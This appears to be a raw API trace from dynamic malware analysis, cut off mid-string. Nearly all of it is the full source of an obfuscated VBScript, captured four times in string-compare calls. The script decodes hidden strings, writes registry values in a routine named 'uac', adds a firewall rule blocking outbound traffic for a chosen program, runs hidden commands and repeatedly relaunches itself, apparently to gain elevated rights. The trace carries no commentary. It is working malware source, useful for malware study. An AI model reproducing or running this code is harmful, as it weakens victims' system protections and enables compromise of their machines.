bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.283] wcsncmp (_String1="7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 42 [0226.283] wcsncmp (_String1="\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.283] wcsncmp (_String1="\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.284] wcsncmp (_String1="index = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.284] wcsncmp (_String1="ndex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction 